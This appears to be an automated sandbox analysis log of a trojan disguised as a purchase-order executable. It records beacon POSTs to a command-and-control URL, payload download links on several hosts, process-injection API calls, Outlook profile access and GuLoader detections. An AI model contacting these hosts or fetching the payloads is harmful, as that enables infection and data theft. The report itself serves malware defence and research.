              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: unknownHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 07:49:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpString found in binary or memory: http://accessasia.com.hk/ovation/five/fre.php
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: http://sinatrasmob.com/pro/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://hrf0ga.bn.files.1drv.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpString found in binary or memory: https://hrf0ga.bn.files.1drv.com/y4m5zM3NcSoKRZxp1cr4njUjeP9hX2vmu4HSL4nnw0taslILmJBULwQ1DfMXTHzg-Rs
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/n
              Source: PO-A2174679-06.exe, 00000000.00000002.346109535.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0699 EnumWindows,NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC81F3 NtResumeThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC7B36 NtProtectVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC570F NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 NtWriteVirtualMemory,TerminateProcess,LdrInitializeThunk,LoadLibraryA,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F5E NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1AB6 NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC829E NtResumeThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC72EF NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC84C5 NtResumeThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC083A NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1A7F NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC446A NtSetInformationThread,NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8664 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC2DFD NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6D2D NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3105 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F06 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4307 NtSetInformationThread,NtWriteVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC077C NtSetInformationThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC2F6F NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8554 NtResumeThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC8150 NtResumeThread,
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB2165
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB084D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB794D
              Source: PO-A2174679-06.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PO-A2174679-06.exe, 00000000.00000002.346228693.00000000021F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 00000000.00000000.231740123.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502209088.0000000002440000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000000.344741544.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502225382.0000000002490000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exeBinary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@43/1
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile created: C:\Users\user\AppData\Local\Temp\~DF584B63FBA4AD36AE.TMPJump to behavior
              Source: PO-A2174679-06.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: PO-A2174679-06.exeVirustotal: Detection: 16%
              Source: unknownProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Yara detected VB6 Downloader GenericShow sources
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_0040DAC0 push dword ptr [ebp-14h]; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00404856 push edi; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00406411 push edx; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_004030D6 pushfd ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_00403096 pushfd ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C9F pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3AE6 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3AC2 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C38 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C14 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC5015 pushfd ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A02 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3C7B pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A76 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3A52 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B9F pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC39DE pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3BC3 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B2B pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC3B50 pushad ; retf
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
